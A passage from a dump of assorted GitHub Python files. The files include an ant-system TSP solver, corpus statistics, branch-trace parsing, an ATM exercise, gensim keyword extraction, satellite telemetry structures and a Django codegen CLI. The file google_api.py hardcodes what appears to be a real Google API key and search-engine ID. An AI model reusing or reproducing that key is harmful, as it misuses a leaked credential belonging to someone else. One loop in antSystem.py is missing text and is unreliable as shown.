open(\"antSystem.txt\",'w')\nfile.write(\"Algoritmo Ant System\\n\")\nfile.write(\"Parametros:\\n\")\nfile.write(\"- Cantidad de hormigas: 10\\n\")\nfile.write(\"- Una Ciudad inicial igual para todas las hormigas\\n\")\nfile.write(\"- Feromona inicial: 0.1\\n\")\nfile.write(\"- Ciudad inicial: D\\n\")\nfile.write(\"- Valores de Alpha, Beta, Rho y Q: alp = 1, bet = 1, p = 0.01, Q = 1\\n\")\nfile.write(\"- Cantidad de iteraciones: 100\\n\")\niteraciones = 100 \nalp = 1\nbet = 1\nindividuos = 10 #5 para el 1er problema\nciudades = 10 #5 para el 1er problema\nciudadIni = 3 #D\np = 0.01\nQ = 1.0\n\ndistancia = [[],[12],[3,9],[23,18,89],[1,3,56,87],[5,41,21,46,55],[23,45,12,75,22,21],[56,5,48,17,86,76,11],[12,41,14,50,14,54,57,63],[11,27,29,42,33,81,48,24,9]]\n#distancia = [[],[12],[3,9],[23,18,89],[1,3,56,87]] #para el 1er problema\nfor i in range(ciudades):\n distancia[i].append(0)\n for j in range(i+1,ciudades):\n distancia[i].append(distancia[j][i])\nfile.write(\"\\nMatriz de distancias:\\n\")\nfor i in range(ciudades):\n file.write(\"\\t\"+chr(65+i))\nfile.write(\"\\n\")\nfor i in range(ciudades):\n file.write(chr(65+i)+\"\\t\"+str(distancia[i])+\"\\n\")\n\n#matriz de visibilidad:\nvisibilidad = []\nfile.write(\"\\nmatriz de visibilidad\\n\")\nfor i in range(ciudades):\n file.write(\"\\t\"+chr(65+i))\nfile.write(\"\\n\")\nfor i in range(ciudades):\n vis = []\n for j in range(ciudades):\n if i==j:\n vis.append(0)\n else:\n visnro = truncate(1.0/distancia[i][j],5)\n vis.append(visnro)\n visibilidad.append(vis)\n\nfor i in range(ciudades):\n file.write(chr(65+i)+\"\\t\"+str(visibilidad[i])+\"\\n\")\n\n#matriz de Feromonas:\nferomonas = []\nfile.write(\"\\nmatriz de feromonas\\n\")\nfor i in range(ciudades):\n file.write(\"\\t\"+chr(65+i))\nfile.write(\"\\n\")\nfor i in range(ciudades):\n fer = []\n for j in range(ciudades):\n if i==j:\n fer.append(0.0)\n else:\n fernro = truncate(0.1,5)\n fer.append(fernro)\n feromonas.append(fer)\n\nfor i in range(ciudades):\n file.write(chr(65+i)+\"\\t\"+str(feromonas[i])+\"\\n\")\n\n#iteraciones:\nfor i in range(iteraciones):\n file.write(\"\\n**** Iteracion \"+str(i)+\" ****\\n\")\n\n #matriz de visibilidad:\n file.write(\"\\nmatriz de visibilidad\\n\")\n for i in range(ciudades):\n file.write(\"\\t\"+chr(65+i))\n file.write(\"\\n\")\n for i in range(ciudades):\n file.write(chr(65+i)+\"\\t\"+str(visibilidad[i])+\"\\n\")\n\n #matriz de Feromonas:\n file.write(\"\\nmatriz de feromonas\\n\")\n for i in range(ciudades):\n file.write(\"\\t\"+chr(65+i))\n file.write(\"\\n\")\n for i in range(ciudades):\n file.write(chr(65+i)+\"\\t\"+str(feromonas[i])+\"\\n\")\n\n caminosHormigas = []\n for j in range(individuos):\n file.write(\"\\nHormiga \"+str(j)+\"\\n\")\n camino = []\n ciudad = ciudadIni\n file.write(\"Ciudad Inicial: \"+chr(65+ciudad)+\"\\n\")\n ciudadesRestantes = range(ciudades)\n while len(ciudadesRestantes)>1:\n suma = 0\n ciudadesRestantes.remove(ciudad)\n #print(ciudadesRestantes)\n for k in range(ciudades):\n if k in ciudadesRestantes:\n #file.write(\"probando...\"+str(feromonas)+\" ciudad: \"+str(ciudad)+ \" k: \"+str(k)+\"\\n\")\n tn = pow(feromonas[ciudad][k],alp)*pow(visibilidad[ciudad][k],bet)\n file.write(chr(65+ciudad)+\"-\"+chr(65+k)+\": t = \"+str(feromonas[ciudad][k])+\" n = \"+str(visibilidad[ciudad][k])+\" t*n = \"+str(tn)+\"\\n\")\n suma += tn\n file.write(\"Suma: \"+str(suma)+\"\\n\")\n probab = []\n for k in range(ciudades):\n if k in ciudadesRestantes:\n if suma!=0:\n prob = pow(feromonas[ciudad][k],alp)*pow(visibilidad[ciudad][k],bet)/suma\n else:\n prob = 0.0\n file.write(chr(65+ciudad)+\"-\"+chr(65+k)+\": prob = \"+str(prob)+\"\\n\")\n probab.append(prob)\n else:\n probab.append(0.0)\n Aleat = random.random()\n file.write(\"Nro aleat para la probabilidad: \"+str(Aleat)+\"\\n\")\n acum = 0\n acumCont = 0\n for k in range(ciudades):\n if acum costo:\n mejorcosto = costo\n\n file.write(\"\\nNuevos valores para Feromonas\\n\")\n for i in range(individuos):\n for j in range(individuos):\n if i!=j:\n evap = feromonas[i][j]*(1-p)\n file.write(chr(65+i)+\"-\"+chr(65+j)+\": Feromona = \"+str(evap))\n sumTot = evap\n for k in range(individuos):\n if pasoPor(i,j,k,caminosHormigas):\n costoIf = Q/costoCaminos[k] \n else:\n costoIf = 0.0\n file.write(\" + \"+str(costoIf))\n sumTot += costoIf\n file.write(\" = \"+str(sumTot)+\"\\n\")\n feromonas[i][j] = sumTot\n\nprint(\"La mejor hormiga hizo un camino de \"+str(mejorcosto))\nfile.close()","repo_name":"CarloCorralesD/DoctoradoUNSA_IA","sub_path":"antSystem.py","file_name":"antSystem.py","file_ext":"py","file_size_in_byte":6675,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6494101855","text":"# https://stackoverflow.com/questions/47624742/how-to-use-stanford-word-tokenizer-in-nltk\nfrom nltk import tokenize\nimport json, jsonlines\n\n\npath = \"./release/tok_train.jsonl\"\nn_samples = 0.\nn_sentences_article = 0.\nn_word_sent_article = 0.\nn_sentences_summary = 0.\nn_word_sent_summary = 0.\n\nwith jsonlines.open(path) as fr:\n for ln in fr:\n txt = ln[\"text\"]\n sum = ln[\"summary\"]\n n_samples += 1\n n_sentences_article += len(txt.split(\" . \"))\n n_sentences_summary += len(sum.split(\" . \"))\n n_word_sent_article += len(txt.split(\" \"))\n n_word_sent_summary += len(sum.split(\" \"))\nfr.close()\n\nprint(\"Article avg sents: %.3f\" % (n_sentences_article / n_samples))\nprint(\"Summary avg sents: %.3f\" % (n_sentences_summary / n_samples))\nprint(\"Article avg words/sent: %.3f\" % (n_word_sent_article / n_sentences_article))\nprint(\"Summary avg words/sent: %.3f\" % (n_word_sent_summary / n_sentences_summary))\nprint(\"Total: %.3f samples\" % n_samples)\n\n\n\"\"\"\nArticle avg sents: 29.909\nSummary avg sents: 1.403\nArticle avg words/sent: 25.864\nSummary avg words/sent: 21.649\nTotal: 995041.000 samples\n\"\"\"\n","repo_name":"jogonba2/TE-TextClassification","sub_path":"CorpusStatistics.py","file_name":"CorpusStatistics.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"38360605715","text":"from predictors import *\n\ndef createStep(address, taken_bit):\n if (taken_bit == '1'):\n return Step(address, Branch.TAKEN)\n else:\n return Step(address, Branch.NOT_TAKEN)\n\ndef parseTrace(file):\n lines = file.read().splitlines()\n steps = [line.split(\" \") for line in lines]\n \n execution = [createStep(step[0], step[1]) for step in steps]\n return execution\n\ndef get_unique_branches(trace):\n unique_branches = set([step.address for step in trace])\n return len(unique_branches)\n\ndef get_percentage_taken(trace):\n taken = 0\n \n for step in trace:\n if step.branch == Branch.TAKEN:\n taken += 1\n \n return taken / len(trace) * 100\n\ndef benchmark_properties(name, trace):\n unique_branches = get_unique_branches(trace)\n percentage_taken = get_percentage_taken(trace)\n total_length = len(trace)\n \n return str(name + \"\\nTotal length: \" + str(total_length) + \"\\nUnique branches: \" + str(unique_branches) + \n \"\\nPercentage taken: \" + str(percentage_taken))\n\n\ntrace_echo = parseTrace(open(\"traces/Echo.out\", \"r\"))\ntrace_fft = parseTrace(open(\"traces/FFT8192.out\", \"r\"))\ntrace_sor = parseTrace(open(\"traces/SOR200.out\", \"r\"))\ntrace_mc = parseTrace(open(\"traces/MonteCarlo20000.out\", \"r\"))\ntrace_loop = parseTrace(open(\"traces/Loop5000.out\", \"r\"))\ntrace_cond = parseTrace(open(\"traces/LoopCondition.out\", \"r\"))\ntrace_sort = parseTrace(open(\"traces/BubbleSort500.out\", \"r\"))\n","repo_name":"12yuens2/branch-prediction","sub_path":"src/benchmarks.py","file_name":"benchmarks.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29691709678","text":"import requests\n\nAPI_KEY = \"AIzaSyAhrht1pkJNuAw3sQuUFh34v-Yoaa9adhI\"\nCX = \"010532648492414585372:wgsvyzd_u2e\"\n\ndef get_links(query):\n\tlinks = []\n\turl = \"https://www.googleapis.com/customsearch/v1\"\n\tparams = {'key': API_KEY, 'cx': CX, 'q': query}\n\tresponse = requests.get(url, params=params)\n\tcontent = response.json()\n\tfor item in content['items']:\n\t\tlinks.append(item['link'])\n\treturn links\n","repo_name":"patrick93/RecInfo","sub_path":"google_api.py","file_name":"google_api.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11449980399","text":"import os\nfrom flask import make_response, jsonify\nfrom wise_io import app\n\n@app.route('/query')\ndef query():\n\tresults = app.config['df'].query(app.config['query'])\n\tret = {\n\t\t'rows': len(results.index),\n\t\t'index_first': results.index[0],\n\t\t'index_last': results.index[len(results.index)-1],\n\t}\n\treturn jsonify(**ret)\n\n@app.route('/')\ndef basic_pages(**kwargs):\n\treturn make_response(open('wise_io/templates/index.html').read())\n","repo_name":"imudiand/flask_angular_pandas","sub_path":"wise_io/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17959072930","text":"# !/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@version: \n@author: sjs\n@contact: ahusjs@163.com\n@file: transaction.py\n@time: 2020/1/8 16:11\n\"\"\"\nimport os, sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(BASE_DIR)\nfrom ATM.core.auth import login_required\nfrom .accounts import change_user_data\n\n\n@login_required\ndef repay(acc_data, log_obj):\n \"\"\"\n 还款\n :param acc_data:\n :return:\n \"\"\"\n balance = acc_data['account_data']['balance']\n credit = acc_data['account_data']['credit']\n if balance >= credit:\n print('您当前的额度为%s,余额为%s,您无需还款'%(credit, balance))\n else:\n while True:\n repay_num = input('您当前的额度为 %s,余额为 %s,您需要还款的数目为 %s\\n>>> : ' %(credit, balance, credit-balance))\n try:\n if float(repay_num) <= credit - balance:\n new_acc_data = change_user_data(acc_data['id'], balance=balance+float(repay_num))\n acc_data['account_data'] = new_acc_data\n log_obj.info('user %s repayed %s '%(acc_data['id'], repay_num))\n break\n else:\n print('超出还款上限,您需要还款的金额为%s'%(credit-balance))\n except Exception as e:\n log_obj.error(e)\n\n@login_required\ndef show_user_info(acc_data, log_obj):\n \"\"\"\n 展示用户信息\n :param acc_data:\n :param log_obj:\n :return:\n \"\"\"\n print(change_user_data(acc_data['id']))\n log_obj.info('user %s query userInfo success'%acc_data['id'])\n\n@login_required\ndef withdraw(acc_data, log_obj):\n balance = acc_data['account_data']['balance']\n print('您当前的余额为%s'%balance)\n while balance > 0:\n withdraw_num = input('请输入您要取款的数目\\n>>> : ')\n try:\n if type(eval(withdraw_num)) == int and int(withdraw_num) >0:\n service_charge = int(withdraw_num) * 0.005\n total_reduce = service_charge + int(withdraw_num)\n if service_charge + int(withdraw_num) <= balance:\n new_acc_data = change_user_data(acc_data['id'], balance=balance - total_reduce)\n acc_data['account_data'] = new_acc_data\n log_obj.info('user %s withdraw %s money, service_charge is %s'%(acc_data['id'], int(withdraw_num), service_charge))\n break\n else:\n print('您的手续费和取款金额的总数超过您的余额,请重新输入')\n elif withdraw_num == 'back':\n break\n else:\n print('您的输入有误,请输入小于当前余额的整数')\n except Exception as e:\n log_obj.error(e)\n\n","repo_name":"sjs123456/p3_study","sub_path":"ATM/core/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38637307281","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html\n\n\nfrom gensim.summarization.textcleaner import tokenize_by_word as _tokenize_by_word\nfrom gensim.utils import to_unicode\nimport numpy\nimport scipy\n\n\ndef mz_keywords(text, blocksize=1024, scores=False, split=False, weighted=True, threshold=0.0):\n \"\"\"Extract keywords from text using the Montemurro and Zanette entropy algorithm. [1]_\n\n Parameters\n ----------\n text: str\n Document for summarization.\n blocksize: int, optional\n Size of blocks to use in analysis.\n scores: bool, optional\n Whether to return score with keywords.\n split: bool, optional\n Whether to return results as list.\n weighted: bool, optional\n Whether to weight scores by word frequency.\n False can useful for shorter texts, and allows automatic thresholding.\n threshold: float or 'auto', optional\n Minimum score for returned keywords, 'auto' calculates the threshold as n_blocks / (n_blocks + 1.0) + 1e-8,\n use 'auto' with `weighted=False`.\n\n Returns\n -------\n results: str\n newline separated keywords if `split` == False **OR**\n results: list(str)\n list of keywords if `scores` == False **OR**\n results: list(tuple(str, float))\n list of (keyword, score) tuples if `scores` == True\n\n Results are returned in descending order of score regardless of the format.\n\n Note\n ----\n This algorithm looks for keywords that contribute to the structure of the\n text on scales of `blocksize` words of larger. It is suitable for extracting\n keywords representing the major themes of long texts.\n\n References\n ----------\n .. [1] Marcello A Montemurro, Damian Zanette, \"Towards the quantification of the semantic information encoded in\n written language\". Advances in Complex Systems, Volume 13, Issue 2 (2010), pp. 135-153,\n DOI: 10.1142/S0219525910002530, https://arxiv.org/abs/0907.1558\n\n \"\"\"\n text = to_unicode(text)\n words = [word for word in _tokenize_by_word(text)]\n vocab = sorted(set(words))\n word_counts = numpy.array(\n [\n [words[i:i + blocksize].count(word) for word in vocab]\n for i in range(0, len(words), blocksize)\n ]\n ).astype('d')\n n_blocks = word_counts.shape[0]\n totals = word_counts.sum(axis=0)\n n_words = totals.sum()\n p = word_counts / totals\n log_p = numpy.log2(p)\n h = numpy.nan_to_num(p * log_p).sum(axis=0)\n analytic = __analytic_entropy(blocksize, n_blocks, n_words)\n h += analytic(totals).astype('d')\n if weighted:\n h *= totals / n_words\n if threshold == 'auto':\n threshold = n_blocks / (n_blocks + 1.0) + 1.0e-8\n weights = [(word, score) for (word, score) in zip(vocab, h) if score > threshold]\n weights.sort(key=lambda x: -x[1])\n result = weights if scores else [word for (word, score) in weights]\n if not (scores or split):\n result = '\\n'.join(result)\n return result\n\n\ndef __log_combinations_inner(n, m):\n \"\"\"Calculates the logarithm of n!/m!(n-m)!\"\"\"\n return -(numpy.log(n + 1) + scipy.special.betaln(n - m + 1, m + 1))\n\n\n__log_combinations = numpy.frompyfunc(__log_combinations_inner, 2, 1)\n\n\ndef __marginal_prob(blocksize, n_words):\n\n def marginal_prob(n, m):\n \"\"\"Marginal probability of a word that occurs n times in the document\n occurring m times in a given block\"\"\"\n\n return numpy.exp(\n __log_combinations(n, m) +\n __log_combinations(n_words - n, blocksize - m) -\n __log_combinations(n_words, blocksize)\n )\n\n return numpy.frompyfunc(marginal_prob, 2, 1)\n\n\ndef __analytic_entropy(blocksize, n_blocks, n_words):\n marginal = __marginal_prob(blocksize, n_words)\n\n def analytic_entropy(n):\n \"\"\"Predicted entropy for a word that occurs n times in the document\"\"\"\n m = numpy.arange(1, min(blocksize, n) + 1).astype('d')\n p = m / n\n elements = numpy.nan_to_num(p * numpy.log2(p)) * marginal(n, m)\n return -n_blocks * elements.sum()\n\n return numpy.frompyfunc(analytic_entropy, 1, 1)\n","repo_name":"alex-tifrea/poincare_glove","sub_path":"gensim/summarization/mz_entropy.py","file_name":"mz_entropy.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"32"} +{"seq_id":"28639723123","text":"from manimlib.imports import *\n\nclass FooScene(Scene):\n def construct(self):\n cm={\"F\":RED,\"G\":BLUE,r\"\\zeta\":PINK,\"U\":YELLOW,\"V\":TEAL}\n tit=TextMobject(\"Vaughan's Identity\")\n eqn=TexMobject(r\"F(s)=\\sum_{n\\le U}{\\Lambda(n)\\over n^s},\\quad\"\n +r\" G(s)=\\sum_{n\\le V}{\\mu(n)\\over n^s}\",\n tex_to_color_map=cm)\n eqn2=TexMobject(r\"-{\\zeta'\\over\\zeta}(s)&=\"\n +r\"F-\\zeta(s)F(s)G(s)-\\zeta'(s)G(s)\"\n +r\"\\\\&+\\left({-\\zeta'\\over\\zeta}(s)-F(s)\\right)\"\n +r\"(1-\\zeta(s)G(s))\",\n tex_to_color_map=cm)\n self.add(VGroup(tit,eqn,eqn2).arrange(DOWN))\n self.wait()\n","repo_name":"TravorLZH/zhihu-blogs","sub_path":"vaughan.py","file_name":"vaughan.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"9947685250","text":"class Solution:\n def distinctPrimeFactors(self, nums: List[int]) -> int:\n \n def findUniquePrimeFactors(n):\n factorization = set()\n d = 2\n while d * d <= n:\n while n % d == 0:\n factorization.add(d)\n n //= d\n d += 1\n if n > 1:\n factorization.add(n)\n return factorization\n \n uniquePrimes = set()\n for i in range(len(nums)):\n currPrimes = findUniquePrimeFactors(nums[i])\n uniquePrimes = uniquePrimes.union(currPrimes)\n \n return len(uniquePrimes)\n","repo_name":"Gizaw-Agodo/A2sV","sub_path":"2521-distinct-prime-factors-of-product-of-array/2521-distinct-prime-factors-of-product-of-array.py","file_name":"2521-distinct-prime-factors-of-product-of-array.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"27654257770","text":"from uuid import uuid4\n\nimport pytest\n\nfrom bstk_datatables.entry import Entry\nfrom bstk_datatables.merge import MergedSchema\nfrom bstk_datatables.schema import Schema, SchemaField, SchemaValuesError\nfrom bstk_datatables.table import Table\n\n\ndef test_simple_assetmanager_pattern():\n # Create a couple of schemas\n _hardware_schema = Schema(uuid=str(uuid4()), name=\"Hardware\")\n assert _hardware_schema.code == \"hardware\"\n\n _name_field = SchemaField(\n name=\"Name\", format={\"type\": \"text\", \"default_value\": \"Name\"}\n )\n _serial_field = SchemaField(name=\"Serial Number\", format={\"type\": \"text\"})\n _type_field = SchemaField(\n name=\"Hardware type\", format={\"type\": \"text\", \"default_value\": \"Hardware\"}\n )\n _hardware_schema.add_field(_name_field)\n _hardware_schema.add_field(_serial_field)\n _hardware_schema.add_field(_type_field)\n\n _printer_schema = Schema(uuid=str(uuid4()), name=\"Printers and print equipment\")\n assert _printer_schema.code == \"printers_and_print_equipment\"\n\n _format_field = SchemaField(\n name=\"Paper Size\", format={\"type\": \"enum\", \"values\": [\"A5\", \"A4\", \"A3\"]}\n )\n _size_field = SchemaField(\n name=\"Physical size\",\n format={\n \"type\": \"enum\",\n \"values\": [\"Portable\", \"Desktop\", \"Standalone\", \"Pallet\"],\n },\n )\n _printer_schema.add_field(_format_field)\n _printer_schema.add_field(_size_field)\n\n # This field will get ignored because already defined in the first schema (ignored during merge)\n _printer_type_field = SchemaField(\n name=\"Hardware type\", format={\"type\": \"text\", \"default_value\": \"printer\"}\n )\n _printer_schema.add_field(_printer_type_field)\n\n # This field should come through with the default\n _hardware_subtype_field = SchemaField(\n name=\"Hardware subtype\",\n format={\"type\": \"text\", \"default_value\": \"printer\", \"readonly\": True},\n )\n _printer_schema.add_field(_hardware_subtype_field)\n\n # Create a table that uses both schemas\n\n _printer_table = Table(uuid=str(uuid4()), name=\"Printers\")\n _printer_table.add_schema(_hardware_schema)\n _printer_table.add_schema(_printer_schema.code)\n\n assert _hardware_schema.code in _printer_table.schemata\n assert _printer_schema.code in _printer_table.schemata\n\n # Create an entry and attach it to the table\n _printer_entry = Entry(uuid=str(uuid4()), name=\"Entry for printer\")\n _printer_table.adopt_entry(_printer_entry)\n\n # Generate the merged schema so we can present it to the user for input\n _merged_table_schema = MergedSchema([_hardware_schema, _printer_schema])\n\n # Collect user data, keyed by the field code\n # @TODO - ?? specifically, how ??\n _user_data = {\n _name_field.code: \"Hallway Printer\",\n _serial_field.code: \"XYZA10592\",\n _format_field.code: \"A0\",\n _size_field.code: \"Standalone\",\n }\n\n # Validate the input\n with pytest.raises(SchemaValuesError) as excinfo:\n _merged_table_schema.process_values(_user_data)\n\n assert \"paper_size\" in excinfo.value.errors\n assert excinfo.value.errors[\"paper_size\"] == [\n \"Must be one of: \" + \", \".join(_format_field.format.values) + \".\"\n ]\n\n # Prompt the user to correct their input for the invalid field\n # print(excinfo.value.errors)\n\n # Accept corrected user data\n _user_data[_format_field.code] = \"A4\"\n\n # Ensure the user data is now correct\n _merged_table_schema.process_values(_user_data)\n\n # Merge in our default values after validation (ensuring we don't trip over readonly fields)\n _user_data = _merged_table_schema.merge_defaults(_user_data)\n\n # Double check the schema would be unhappy about the readonly field having a value\n with pytest.raises(SchemaValuesError):\n _merged_table_schema.process_values(_user_data)\n\n # Make sure we've got our default value from the first hardware type entry\n assert _user_data.get(_type_field.code, None) == _type_field.format.default_value\n\n # Make sure we've got our default value from the second schema\n assert (\n _user_data.get(_hardware_subtype_field.code, None)\n == _hardware_subtype_field.format.default_value\n )\n\n # Make sure the name provided wasn't erased by the default value\n assert _user_data.get(_name_field.code, None) == \"Hallway Printer\"\n\n # Set the user data into the entry\n _printer_entry.values = _user_data\n\n # Grab the entry data so it can be saved\n _entry_for_saving = _printer_entry.export()\n assert _entry_for_saving[\"values\"] == _user_data\n","repo_name":"broadstack-com-au/bstk-datatables","sub_path":"tests/functional/test_asset_manager_sample.py","file_name":"test_asset_manager_sample.py","file_ext":"py","file_size_in_byte":4574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41036989027","text":"from typing import List\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import Union\n\nimport typer\nfrom rich.console import Console\nfrom rich.syntax import Syntax\n\nfrom django_codegen.lib.codegen import AppDoesNotExist\nfrom django_codegen.lib.codegen import FIELD_GENERATOR_REGISTRY\nfrom django_codegen.lib.codegen import ModelAlreadyExists\nfrom django_codegen.lib.codegen import ModelGenerator\n\napp = typer.Typer()\n\nParsedFieldDefinitions = List[Tuple[str, str, List[str]]]\n\n\ndef parse_field_definitions(field_definitions: List[str]) -> ParsedFieldDefinitions:\n parsed_field_definitions: ParsedFieldDefinitions = []\n for definition in field_definitions:\n deconstructed = definition.split(\":\")\n\n if not len(deconstructed) >= 2:\n typer.secho(\n f'\"{definition}\" is not a valid field definition',\n fg=typer.colors.BRIGHT_RED,\n bold=True,\n )\n raise typer.Exit(code=1)\n\n field_name, class_name, *arguments = deconstructed\n\n parsed_field_definitions.append((field_name, class_name, arguments))\n\n return parsed_field_definitions\n\n\ndef print_available_field_definitions():\n for i, name in enumerate(FIELD_GENERATOR_REGISTRY.keys()):\n number = typer.style(f\"{i}.\", bold=True)\n typer.echo(f\" {number} {name}\")\n\n\ndef collect_field_definitions() -> ParsedFieldDefinitions:\n definitions: ParsedFieldDefinitions = []\n\n while True:\n field_name: Union[str, bool] = typer.prompt(\n \"Field name (Empty to continue)\", default=False, show_default=False\n )\n\n if not field_name:\n break\n\n print_available_field_definitions()\n while True:\n choice = typer.prompt(\"Pick one\", type=int)\n try:\n class_name = list(FIELD_GENERATOR_REGISTRY.keys())[choice]\n definitions.append((field_name, class_name, []))\n break\n except IndexError:\n typer.echo(f\"Error: {choice} is not a valid choice.\")\n continue\n\n return definitions\n\n\napp_name_argument = typer.Argument(None)\nmodel_name_argument = typer.Argument(None)\nfield_definitions_argument = typer.Argument(None)\nordering_option = typer.Option(None, \"--ordering\", \"-o\")\ndjango_settings_option = typer.Option(None, \"--django-settings\", \"-s\")\n\n\ndef print_code(code):\n console = Console()\n syntax = Syntax(code, \"python\")\n console.print(syntax)\n\n\n@app.command(help=\"Generate a model\")\ndef model(\n app_name: Optional[str] = app_name_argument,\n model_name: Optional[str] = model_name_argument,\n field_definitions: Optional[List[str]] = field_definitions_argument,\n ordering: Optional[str] = ordering_option,\n django_settings: Optional[str] = django_settings_option,\n):\n\n if not app_name:\n app_name = typer.prompt(\"What app does the model belong to?\")\n\n if not model_name:\n model_name = typer.prompt(\"What is the name of the model?\")\n\n if not field_definitions:\n fields = collect_field_definitions()\n else:\n fields = parse_field_definitions(field_definitions)\n\n generator = ModelGenerator(\n app_name=app_name,\n model_name=model_name,\n field_definitions=fields,\n ordering=ordering,\n django_settings=django_settings,\n )\n\n try:\n generator.check()\n except (ModelAlreadyExists, AppDoesNotExist) as exc:\n typer.echo(typer.style(str(exc), fg=typer.colors.RED, bold=True))\n raise typer.Exit(code=1)\n\n try:\n rendered = generator.render()\n except TypeError as exc:\n typer.echo(typer.style(str(exc), fg=typer.colors.RED, bold=True))\n raise typer.Exit(code=1)\n\n typer.echo(f\"# App name: {app_name}\")\n\n print_code(rendered)\n\n confirmation = typer.confirm(\"Is this what you want?\", default=True)\n if confirmation:\n generator.write_model()\n\n\n@app.command()\ndef view():\n pass\n\n\nif __name__ == \"__main__\":\n app()\n","repo_name":"valberg/django-codegen","sub_path":"django_codegen/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":4009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36339794420","text":"from construct import *\n\nfrom ..adapters import AffineAdapter, LinearAdapter\n\n\nId = Enum(\n Int8ub,\n beacon_ngham_obdh_data=0x00,\n beacon_ngham_eps_data=0x01,\n beacon_ngham_ttc_data=0x02,\n beacon_ax25_obdh_data=0x03,\n beacon_ax25_eps_data=0x04,\n beacon_ax25_ttc_data=0x05,\n downlink_telemetry=0x10,\n downlink_ping_answer=0x11,\n downlink_data_request_answer=0x12,\n downlink_hibernation_feedback=0x13,\n downlink_charge_reset_feedback=0x14,\n downlink_message_broadcast=0x15,\n downlink_payload_x_status=0x16,\n downlink_rush_status=0x17,\n uplink_ping_request=0x20,\n uplink_data_request=0x21,\n uplink_enter_hibernation=0x22,\n uplink_leave_hibernation=0x23,\n uplink_charge_reset=0x24,\n uplink_broadcast_message=0x25,\n uplink_payload_x_status_request=0x26,\n uplink_payload_x_status_swap=0x27,\n uplink_payload_x_data_upload=0x28,\n uplink_rush_enable=0x29)\n\nBatteryVoltage = LinearAdapter(32/4.883e-3, Int16ub)\nBatteryTemperature = LinearAdapter(32/0.125, Int24ub)\nBatteryCharge = LinearAdapter(1/6.25e-4, Int16ub)\nSolarPanelCurrent = LinearAdapter(1/((2.5/4095)*(1/(0.05*0.025*3300))),\n Int16ub)\nSolarPanelVoltage = AffineAdapter(4095/2.5, -93.1/100, Int16ub)\nImuAccel = LinearAdapter(32768.0/16.0, Int16sb)\nImuGyro = LinearAdapter(32768.0/250, Int16sb)\n\nOBDHStatus = BitStruct(\n Padding(3),\n 'antenna' / Flag,\n 'imu' / Flag,\n 'sd_card' / Flag,\n 'rush' / Flag,\n 'eps' / Flag\n )\n\nSystemTime = Struct(\n 'seconds' / Int8ub,\n 'minutes' / Int24ub,\n )\n\nEPS = Struct(\n 'battery_voltage' / BatteryVoltage[2],\n 'battery_temperature' / BatteryTemperature[2],\n 'battery_charge' / BatteryCharge,\n 'solar_panel_current' / SolarPanelCurrent[6],\n 'solar_panel_voltage' / SolarPanelVoltage[3],\n 'energy_level' / Int8ub,\n )\n\nOBDH = Struct(\n 'eps' / EPS,\n 'status' / OBDHStatus,\n 'imu_accelerometer' / ImuAccel[3],\n 'imu_gyroscope' / ImuGyro[3],\n 'system_time' / SystemTime,\n 'odbh_resets' / Int8ub\n )\n\nfloripasat = Struct(\n 'ngham_padding' / Int8ub,\n 'id' / Id,\n 'callsign' / Bytes(7),\n 'payload' / Switch(this.id, {\n 'beacon_ngham_obdh_data': OBDH,\n 'beacon_ngham_eps_data': EPS,\n 'beacon_ax25_obdh_data': OBDH,\n 'beacon_ax25_eps_data': EPS,\n }, default=GreedyBytes)\n )\n","repo_name":"daniestevez/gr-satellites","sub_path":"python/telemetry/floripasat.py","file_name":"floripasat.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":700,"dataset":"github-code","pt":"32"} +{"seq_id":"71308041692","text":"import asyncio\nimport json\nimport logging\nfrom collections import Mapping, Sequence\n\nfrom aiohttp import ClientOSError, client\n\nfrom ..http import URL\nfrom . import StorageError, base\n\n\nclass RoStorage(base.AbstractStorageReadOnly):\n \"\"\" ReadOnly storage over http GET\n config:\n semaphore: int\n allow_hosts: list\n return_status: bool, method get returns tuple (CODE, VALUE)\n prefix: url prefix\n headers: Mapping or None\n template: url template\n format: [json|str|bytes], default json\n \"\"\"\n async def init(self):\n self._prefix = self.config.get('prefix')\n self._template = self.config.get('template')\n if self._prefix:\n self._prefix = URL(self._prefix)\n self._semaphore = asyncio.Semaphore(\n self.config.get('semaphore', 20), loop=self.loop)\n self._allow_hosts = self.config.get('allow_hosts')\n self._format = self.config.get('format', 'json')\n self._return_status = self.config.get('return_status', False)\n\n headers = self.config.get('headers')\n self.session_params = {}\n if headers:\n self.session_params['headers'] = dict(headers)\n for param in ('conn_timeout', 'read_timeout'):\n if param in self.config:\n self.session_params[param] = self.config[param]\n self.reset_session()\n self.context.on_stop.append(self.stop)\n\n def reset_session(self, **kwargs):\n session = getattr(self, 